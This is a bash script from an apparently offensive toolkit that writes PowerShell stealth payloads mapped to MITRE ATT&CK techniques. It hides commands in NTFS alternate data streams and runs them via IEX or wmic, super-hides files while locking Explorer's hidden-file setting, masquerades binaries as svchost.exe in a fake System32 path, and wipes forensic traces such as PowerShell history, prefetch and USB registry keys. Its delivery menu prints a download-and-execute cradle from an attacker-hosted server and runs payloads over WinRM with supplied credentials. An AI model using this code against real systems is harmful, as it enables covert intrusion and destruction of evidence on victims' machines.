#!/bin/bash
# Windows Stealth & Indicator Removal Payload Generator — 4 Techniques
# Generates PowerShell (.ps1) payloads for hiding and cleanup with optional WinRM delivery

RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[1;33m'
CYAN='\033[0;36m'
NC='\033[0m'

PAYLOAD_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")/.." && pwd)/payloads"
mkdir -p "$PAYLOAD_DIR" 2>/dev/null

banner_winstealth() {
    echo -e "${RED}"
    echo "  ╔═══════════════════════════════════════════════╗"
    echo "  ║   Windows Stealth & Indicator Removal          ║"
    echo "  ║   4 MITRE ATT&CK Techniques — PowerShell      ║"
    echo "  ╚═══════════════════════════════════════════════╝"
    echo -e "${NC}"
}

_winrm_deliver() {
    local PS1_FILE="$1"
    local BASENAME
    BASENAME=$(basename "$PS1_FILE")
    echo ""
    echo -e "${YELLOW}═══ Delivery Options ═══${NC}"
    echo -e "  ${CYAN}[1]${NC} Manual transfer"
    echo -e "  ${CYAN}[2]${NC} Python HTTP + download cradle"
    echo -e "  ${CYAN}[3]${NC} Evil-WinRM upload"
    echo -e "  ${CYAN}[4]${NC} WinRM Invoke-Command"
    echo -e "  ${CYAN}[5]${NC} Skip"
    read -p "  Delivery [5]: " DEL; DEL="${DEL:-5}"
    case "$DEL" in
        1) echo -e "${GREEN}[+] Payload: ${PS1_FILE}${NC}"; echo -e "${YELLOW}[*] Run: powershell -ep bypass -f ${BASENAME}${NC}" ;;
        2)
            local LHOST; LHOST=$(ip -4 addr show scope global | awk '/inet /{print $2}' | cut -d/ -f1 | head -1)
            read -p "  IP [${LHOST}]: " IP; IP="${IP:-$LHOST}"
            read -p "  Port [8443]: " PORT; PORT="${PORT:-8443}"
            echo -e "${YELLOW}[*] Server: cd ${PAYLOAD_DIR} && python3 -m http.server ${PORT}${NC}"
            echo -e "${YELLOW}[*] Target: IEX(New-Object Net.WebClient).DownloadString('http://${IP}:${PORT}/${BASENAME}')${NC}"
            read -p "  Start server? [y/N]: " yn
            [[ "$yn" =~ ^[Yy] ]] && { cd "$PAYLOAD_DIR" && python3 -m http.server "$PORT" & disown; echo -e "${GREEN}[+] Serving on :${PORT}${NC}"; }
            ;;
        3)
            read -p "  Target IP: " TGT; read -p "  User: " TU; read -p "  Pass: " -s TP; echo ""
            echo -e "${YELLOW}[*] evil-winrm -i ${TGT} -u '${TU}' -p '***' then: upload ${PS1_FILE}${NC}"
            ;;
        4)
            read -p "  Target IP: " TGT; read -p "  User: " TU; read -p "  Pass: " -s TP; echo ""
            local RE="${PAYLOAD_DIR}/winrm_exec.ps1"
            local SC; SC=$(cat "$PS1_FILE")
            cat > "$RE" << PSEOF
\$p = ConvertTo-SecureString '${TP}' -AsPlainText -Force
\$c = New-Object System.Management.Automation.PSCredential('${TU}', \$p)
Invoke-Command -ComputerName '${TGT}' -Credential \$c -ScriptBlock { ${SC} }
PSEOF
            echo -e "${GREEN}[+] WinRM exec script: ${RE}${NC}"
            ;;
        5) echo -e "${GREEN}[+] Saved: ${PS1_FILE}${NC}" ;;
    esac
}

# ──────────────────────────────────────────────
# 1. T1564.004 — Alternate Data Streams (ADS)
# ──────────────────────────────────────────────
gen_ads() {
    echo -e "${CYAN}[*] T1564.004 — Alternate Data Streams (NTFS)${NC}"

    echo -e "  Action:"
    echo -e "  ${CYAN}[1]${NC} Hide payload in ADS of existing file"
    echo -e "  ${CYAN}[2]${NC} Hide payload in ADS of a directory"
    echo -e "  ${CYAN}[3]${NC} Execute payload from ADS"
    echo -e "  ${CYAN}[4]${NC} Enumerate ADS on a path"
    echo -e "  ${CYAN}[5]${NC} ALL — full toolkit"
    read -p "  Action [5]: " AA; AA="${AA:-5}"

    local OUTFILE="${PAYLOAD_DIR}/win_ads.ps1"
    cat > "$OUTFILE" << 'PSEOF'
# T1564.004 — Alternate Data Streams (NTFS)
# Generated by D3m0n1z3dShell
# ADS allows hiding data inside NTFS file metadata — invisible to dir/Explorer

Write-Host "=== Alternate Data Streams Toolkit ===" -ForegroundColor Cyan
PSEOF

    if [[ "$AA" == "1" || "$AA" == "5" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# 1. Hide payload in ADS of an existing file
function Hide-InADS {
    param(
        [string]$HostFile = "C:\Users\Public\Documents\desktop.ini",
        [string]$StreamName = "kernel32",
        [string]$PayloadPath = ""
    )

    if (-not (Test-Path $HostFile)) {
        "Placeholder" | Set-Content $HostFile
    }

    if ($PayloadPath -and (Test-Path $PayloadPath)) {
        # Hide a file
        $data = [IO.File]::ReadAllBytes($PayloadPath)
        $stream = "$HostFile`:$StreamName"
        [IO.File]::WriteAllBytes($stream, $data)
        Write-Host "[+] Hidden '$PayloadPath' in ADS: $stream ($($data.Length) bytes)" -ForegroundColor Green
    } else {
        # Hide a command
        $cmd = Read-Host "Enter PowerShell command to hide"
        Set-Content "$HostFile`:$StreamName" $cmd
        Write-Host "[+] Command hidden in: $HostFile`:$StreamName" -ForegroundColor Green
    }
}

Write-Host "`n[1] Hiding payload in ADS..." -ForegroundColor Yellow
Hide-InADS
PSEOF
    fi

    if [[ "$AA" == "2" || "$AA" == "5" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# 2. Hide in directory ADS (even less visible)
function Hide-InDirADS {
    param([string]$Dir = "C:\Users\Public")

    $cmd = Read-Host "Enter command to hide in directory ADS"
    $streamName = "sr"
    Set-Content "${Dir}:${streamName}" $cmd
    Write-Host "[+] Hidden in directory ADS: ${Dir}:${streamName}" -ForegroundColor Green
    Write-Host "[*] Retrieve: Get-Content ${Dir}:${streamName}" -ForegroundColor Yellow
}

Write-Host "`n[2] Directory ADS..." -ForegroundColor Yellow
Hide-InDirADS
PSEOF
    fi

    if [[ "$AA" == "3" || "$AA" == "5" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# 3. Execute from ADS
function Invoke-FromADS {
    param([string]$ADSPath)

    if (-not $ADSPath) {
        $ADSPath = Read-Host "Enter ADS path (e.g., C:\Users\Public\doc.txt:payload)"
    }

    Write-Host "[*] Execution methods:" -ForegroundColor Yellow
    Write-Host "    # PowerShell:" -ForegroundColor White
    Write-Host "    powershell -ep bypass -c `"IEX(Get-Content '$ADSPath')`"" -ForegroundColor White
    Write-Host "    # WMIC:" -ForegroundColor White
    Write-Host "    wmic process call create `"powershell -ep bypass -c IEX(gc '$ADSPath')`"" -ForegroundColor White
    Write-Host "    # Direct (for executables):" -ForegroundColor White
    Write-Host "    Start-Process $ADSPath" -ForegroundColor White
}

Write-Host "`n[3] Execute from ADS..." -ForegroundColor Yellow
Invoke-FromADS
PSEOF
    fi

    if [[ "$AA" == "4" || "$AA" == "5" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# 4. Enumerate ADS on a path
function Find-ADS {
    param([string]$ScanPath = "C:\Users")

    Write-Host "`n[4] Scanning for ADS in: $ScanPath" -ForegroundColor Yellow
    $found = 0
    Get-ChildItem -Path $ScanPath -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $streams = Get-Item $_.FullName -Stream * -ErrorAction SilentlyContinue | Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -ne 'Zone.Identifier' }
        foreach ($s in $streams) {
            Write-Host "  [!] $($_.FullName):$($s.Stream) — $($s.Length) bytes" -ForegroundColor Red
            $found++
        }
    }
    Write-Host "[*] Found $found alternate data streams" -ForegroundColor $(if ($found -gt 0) { "Red" } else { "Green" })
}

Find-ADS
PSEOF
    fi

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 2. T1564.001 — Hidden Files and Directories
# ──────────────────────────────────────────────
gen_hidden() {
    echo -e "${CYAN}[*] T1564.001 — Hidden Files & Directories${NC}"

    local OUTFILE="${PAYLOAD_DIR}/win_hidden.ps1"
    cat > "$OUTFILE" << 'PSEOF'
# T1564.001 — Hidden Files and Directories
# Generated by D3m0n1z3dShell

Write-Host "=== Hidden File/Directory Toolkit ===" -ForegroundColor Cyan

function Set-SuperHidden {
    param([string]$Path)

    if (-not (Test-Path $Path)) {
        Write-Host "[-] Path not found: $Path" -ForegroundColor Red
        return
    }

    $item = Get-Item $Path -Force
    # Set Hidden + System + NotContentIndexed
    $item.Attributes = $item.Attributes -bor [IO.FileAttributes]::Hidden
    $item.Attributes = $item.Attributes -bor [IO.FileAttributes]::System
    $item.Attributes = $item.Attributes -bor [IO.FileAttributes]::NotContentIndexed

    Write-Host "[+] Super-hidden: $Path" -ForegroundColor Green
    Write-Host "    Attributes: $($item.Attributes)" -ForegroundColor White
}

function New-HiddenDirectory {
    param([string]$BasePath = "C:\Users\Public")

    # Use a name that looks like a system folder
    $names = @("$BasePath\AppData", "$BasePath\{AB1F5E3C-1234-4567-8901-ABCDEF123456}",
               "$BasePath\.cache", "$BasePath\SystemProfile")

    $dir = $names | Get-Random
    New-Item -ItemType Directory -Path $dir -Force | Out-Null
    Set-SuperHidden $dir
    Write-Host "[+] Hidden directory created: $dir" -ForegroundColor Green
    return $dir
}

function Disable-ShowHidden {
    # Prevent users from seeing hidden files even if they toggle Explorer setting
    Write-Host "[*] Disabling 'Show Hidden Files' in Explorer..." -ForegroundColor Yellow
    try {
        $regPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
        Set-ItemProperty -Path $regPath -Name "Hidden" -Value 2 -Type DWord -Force
        Set-ItemProperty -Path $regPath -Name "ShowSuperHidden" -Value 0 -Type DWord -Force
        # Also set policy to prevent toggling
        $polPath = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"
        New-Item -Path $polPath -Force -ErrorAction SilentlyContinue | Out-Null
        Set-ItemProperty -Path $polPath -Name "NoFolderOptions" -Value 1 -Type DWord -Force
        Write-Host "[+] Explorer hidden file display locked off" -ForegroundColor Green
    } catch {
        Write-Host "[-] Failed: $_" -ForegroundColor Red
    }
}

# Interactive
$target = Read-Host "Path to hide (file or directory)"
if ($target) { Set-SuperHidden $target }

Write-Host ""
$createDir = Read-Host "Create hidden staging directory? (y/N)"
if ($createDir -match '^[Yy]') { New-HiddenDirectory }

$lockExplorer = Read-Host "Lock Explorer 'Show Hidden Files' off? (y/N)"
if ($lockExplorer -match '^[Yy]') { Disable-ShowHidden }
PSEOF

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 3. T1036.005 — Process Name Masquerading
# ──────────────────────────────────────────────
gen_masquerade() {
    echo -e "${CYAN}[*] T1036.005 — Process Name/Path Masquerading${NC}"

    echo -e "  Masquerade as:"
    echo -e "  ${CYAN}[1]${NC} svchost.exe"
    echo -e "  ${CYAN}[2]${NC} explorer.exe"
    echo -e "  ${CYAN}[3]${NC} RuntimeBroker.exe"
    echo -e "  ${CYAN}[4]${NC} Custom name"
    read -p "  Target [1]: " MN; MN="${MN:-1}"

    case "$MN" in
        1) MNAME="svchost.exe" ;;
        2) MNAME="explorer.exe" ;;
        3) MNAME="RuntimeBroker.exe" ;;
        4) read -p "  Process name: " MNAME ;;
    esac

    read -p "  Payload to execute [powershell.exe -ep bypass -w hidden]: " MPAY
    MPAY="${MPAY:-powershell.exe -ep bypass -w hidden}"

    local OUTFILE="${PAYLOAD_DIR}/win_masquerade.ps1"
    cat > "$OUTFILE" << PSEOF
# T1036.005 — Process Name Masquerading
# Generated by D3m0n1z3dShell
# Copies payload as a legitimate-looking process name in a trusted path

\$masqueradeName = "${MNAME}"
\$payload = "${MPAY}"

Write-Host "[*] Process Masquerading as: \$masqueradeName" -ForegroundColor Yellow

# Method 1: Copy to temp with legitimate name
\$tempPath = "\$env:TEMP\\\$masqueradeName"
\$sourceExe = (\$payload -split ' ')[0]
\$realPath = (Get-Command \$sourceExe -ErrorAction SilentlyContinue).Source

if (\$realPath -and (Test-Path \$realPath)) {
    Copy-Item \$realPath \$tempPath -Force
    Write-Host "[+] Copied \$realPath -> \$tempPath" -ForegroundColor Green

    # Get arguments (everything after the exe name)
    \$args = (\$payload -replace [regex]::Escape(\$sourceExe), '').Trim()
    Start-Process \$tempPath -ArgumentList \$args -WindowStyle Hidden
    Write-Host "[+] Started masqueraded process: \$masqueradeName" -ForegroundColor Green
} else {
    Write-Host "[-] Source exe not found: \$sourceExe" -ForegroundColor Red
}

# Method 2: Use a trusted path mimic (directory with trailing space or unicode)
\$fakePath = "C:\\Windows \\System32"
try {
    New-Item -ItemType Directory -Path \$fakePath -Force -ErrorAction SilentlyContinue | Out-Null
    if (\$realPath) {
        Copy-Item \$realPath "\$fakePath\\\$masqueradeName" -Force
        Write-Host "[+] Placed in fake trusted path: \$fakePath\\\$masqueradeName" -ForegroundColor Green
        Write-Host "[*] This path looks like C:\\Windows\\System32 but has a trailing space" -ForegroundColor Yellow
    }
} catch {
    Write-Host "[-] Fake path creation failed: \$_" -ForegroundColor Red
}
PSEOF

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# 4. T1070.004 — Secure Deletion & Indicator Removal
# ──────────────────────────────────────────────
gen_cleanup() {
    echo -e "${CYAN}[*] T1070.004 — Secure Deletion & Indicator Removal${NC}"

    echo -e "  Scope:"
    echo -e "  ${CYAN}[1]${NC} Remove specific files securely"
    echo -e "  ${CYAN}[2]${NC} Clear forensic artifacts (history, prefetch, recent)"
    echo -e "  ${CYAN}[3]${NC} Full cleanup (both)"
    read -p "  Scope [3]: " CS; CS="${CS:-3}"

    local OUTFILE="${PAYLOAD_DIR}/win_cleanup.ps1"
    cat > "$OUTFILE" << 'PSEOF'
# T1070.004 — Secure Deletion & Indicator Removal
# Generated by D3m0n1z3dShell

Write-Host "=== Secure Cleanup ===" -ForegroundColor Cyan
PSEOF

    if [[ "$CS" == "1" || "$CS" == "3" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Secure file deletion — overwrite before delete
function Remove-Secure {
    param([string]$Path, [int]$Passes = 3)

    if (-not (Test-Path $Path)) {
        Write-Host "[-] Not found: $Path" -ForegroundColor Red
        return
    }

    $files = if ((Get-Item $Path) -is [IO.DirectoryInfo]) {
        Get-ChildItem $Path -Recurse -File -Force
    } else {
        @(Get-Item $Path -Force)
    }

    foreach ($f in $files) {
        try {
            $size = $f.Length
            for ($i = 0; $i -lt $Passes; $i++) {
                $bytes = New-Object byte[] $size
                (New-Object Random).NextBytes($bytes)
                [IO.File]::WriteAllBytes($f.FullName, $bytes)
            }
            # Zero pass
            [IO.File]::WriteAllBytes($f.FullName, (New-Object byte[] $size))
            Remove-Item $f.FullName -Force
            Write-Host "  [+] Wiped: $($f.FullName) ($Passes passes)" -ForegroundColor Green
        } catch {
            Write-Host "  [-] Failed: $($f.FullName) — $_" -ForegroundColor Red
        }
    }

    # Remove empty directories
    if ((Get-Item $Path -ErrorAction SilentlyContinue) -is [IO.DirectoryInfo]) {
        Remove-Item $Path -Recurse -Force -ErrorAction SilentlyContinue
    }
}

$target = Read-Host "File/directory to securely delete"
if ($target) { Remove-Secure -Path $target }
PSEOF
    fi

    if [[ "$CS" == "2" || "$CS" == "3" ]]; then
        cat >> "$OUTFILE" << 'PSEOF'

# Clear forensic artifacts
Write-Host "`n[*] Clearing forensic artifacts..." -ForegroundColor Yellow

# PowerShell history
$histPath = (Get-PSReadLineOption -ErrorAction SilentlyContinue).HistorySavePath
if ($histPath -and (Test-Path $histPath)) {
    Remove-Item $histPath -Force
    Write-Host "  [+] PowerShell history cleared" -ForegroundColor Green
}

# Recent files
$recentPath = "$env:APPDATA\Microsoft\Windows\Recent"
if (Test-Path $recentPath) {
    Remove-Item "$recentPath\*" -Force -ErrorAction SilentlyContinue
    Write-Host "  [+] Recent files cleared" -ForegroundColor Green
}

# Prefetch (admin)
$prefetchPath = "C:\Windows\Prefetch"
if (Test-Path $prefetchPath) {
    try {
        Remove-Item "$prefetchPath\*.pf" -Force -ErrorAction Stop
        Write-Host "  [+] Prefetch files cleared" -ForegroundColor Green
    } catch {
        Write-Host "  [-] Prefetch (need admin): $_" -ForegroundColor Yellow
    }
}

# Temp files
Remove-Item "$env:TEMP\*" -Recurse -Force -ErrorAction SilentlyContinue
Write-Host "  [+] Temp files cleared" -ForegroundColor Green

# Thumbnail cache
Remove-Item "$env:LOCALAPPDATA\Microsoft\Windows\Explorer\thumbcache_*.db" -Force -ErrorAction SilentlyContinue
Write-Host "  [+] Thumbnail cache cleared" -ForegroundColor Green

# USB history (admin)
try {
    Remove-Item "HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*" -Recurse -Force -ErrorAction Stop
    Write-Host "  [+] USB history cleared" -ForegroundColor Green
} catch {
    Write-Host "  [-] USB history (need admin)" -ForegroundColor Yellow
}

# Network shares recent
Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Map Network Drive MRU\*" -Force -ErrorAction SilentlyContinue 2>$null
Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\*" -Force -ErrorAction SilentlyContinue 2>$null
Write-Host "  [+] MRU entries cleared" -ForegroundColor Green

# Recycle bin
try {
    Clear-RecycleBin -Force -ErrorAction SilentlyContinue
    Write-Host "  [+] Recycle bin emptied" -ForegroundColor Green
} catch {}

Write-Host "`n[+] Cleanup complete" -ForegroundColor Green
PSEOF
    fi

    echo -e "${GREEN}[+] Payload generated: ${OUTFILE}${NC}"
    _winrm_deliver "$OUTFILE"
}

# ──────────────────────────────────────────────
# Main Menu
# ──────────────────────────────────────────────
main() {
    banner_winstealth

    echo -e "  ${CYAN}[1]${NC} Alternate Data Streams — ADS (T1564.004)"
    echo -e "  ${CYAN}[2]${NC} Hidden Files & Directories (T1564.001)"
    echo -e "  ${CYAN}[3]${NC} Process Name Masquerading (T1036.005)"
    echo -e "  ${CYAN}[4]${NC} Secure Deletion & Indicator Removal (T1070.004)"
    echo ""
    read -p "Choose [1-4]: " OPT

    case "$OPT" in
        1) gen_ads ;;
        2) gen_hidden ;;
        3) gen_masquerade ;;
        4) gen_cleanup ;;
        *) echo -e "${RED}[!] Invalid option${NC}" ;;
    esac
}

main
